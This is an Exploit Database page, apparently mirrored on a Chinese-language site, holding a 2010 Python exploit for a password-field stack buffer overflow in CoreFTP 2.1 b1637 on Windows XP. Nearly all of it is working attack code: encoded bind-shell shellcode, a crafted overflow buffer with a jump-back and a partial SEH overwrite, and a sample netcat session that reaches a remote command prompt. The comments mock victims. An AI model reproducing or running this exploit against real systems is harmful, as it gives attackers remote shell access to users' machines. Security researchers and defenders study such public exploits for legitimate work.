CoreFTP 2.1 b1637 – Password field Universal Buffer Overflow

• Exploit Database
• 40 阅读

• 作者： mr_me
  日期： 2010-02-02
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11314/

• #!/usr/bin/python
  #
  # Vulnerability : CoreFTP v2.1 b1637 (password field) Universal BOF exploit
  # Found by		: mr_me (seeleymagic [at] hotmail [dot] com)
  # Coded by		: mr_me & corelanc0d3r
  # Download from : http://www.coreftp.com/download.html
  # Tested on : XP SP3 En (VirtualBox)
  # Greetz to : corelanc0d3r, EdiStrosar, jnz, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team
  # Advisory		: http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-007-coreftp-password-field-stack-buffer-overflow/
  #
  # Thanks to Dr_IDE for pointing me to this app :)
  # Notes: This app was compiled with safeSEH, so a call dword did the trick ;)
  # If you manage to convince a user to input a 6000 length string as a password
  # then they deserve to be owned...! ;)
  #
  # Usage: Quick connect --> Advanced --> SSH --> password --> bind shell ;)
  #
  # mrme@backtrack:~$ nc -v 192.168.2.9 4444
  # 192.168.2.9: inverse host lookup failed: Unknown server error :
  # Connection timed out
  # (UNKNOWN) [192.168.2.9] 4444 (?) open
  # Microsoft Windows XP [Version 5.1.2600]
  # (C) Copyright 1985-2001 Microsoft Corp.
  #
  # C:\PROGRA~1\CoreFTP>
  #
  
  print "|------------------------------------------------------------------|"
  print "| __ __|"
  print "| _________________/ /___ _____ / /________ _____ ___|"
  print "|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
  print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |"
  print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|"
  print "||"
  print "| http://www.corelan.be:8800 |"
  print "|security@corelan.be |"
  print "||"
  print "|-------------------------------------------------[ EIP Hunters ]--|"
  print "[+] CoreFTP v2.1 b1637 (password field) Universal BOF exploit"
  
  sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
  "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
  "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
  "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
  "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
  "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
  "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
  "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
  "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
  "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
  "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
  "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
  "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
  "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
  "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
  "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
  "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
  "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
  "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
  "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
  "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
  "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
  "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
  "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
  "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
  "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
  "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
  "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
  "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
  "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
  "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
  "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
  "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
  "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
  "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
  "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
  "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
  "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
  "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
  "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
  "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
  "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
  "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
  "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
  "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a");
  
  print "[+] Creating evil buffer string in overflowpassword.txt, ph33r"
  
  stuff = "\x41" * 145
  stuff += "\x90" * 5
  stuff += sc
  stuff += "\x41" * (1008-len(stuff)-5)
  stuff += "\xe9\x7c\xfc\xff\xff" # Lets fly
  stuff += "\xeb\xf9\x90\x90" # Jump back
  stuff += "\x0b\x0b\x27\x00" # partial/null overwrite
  
  pwn = open('overflowpassword.txt','w');
  pwn.write(stuff);
  pwn.close();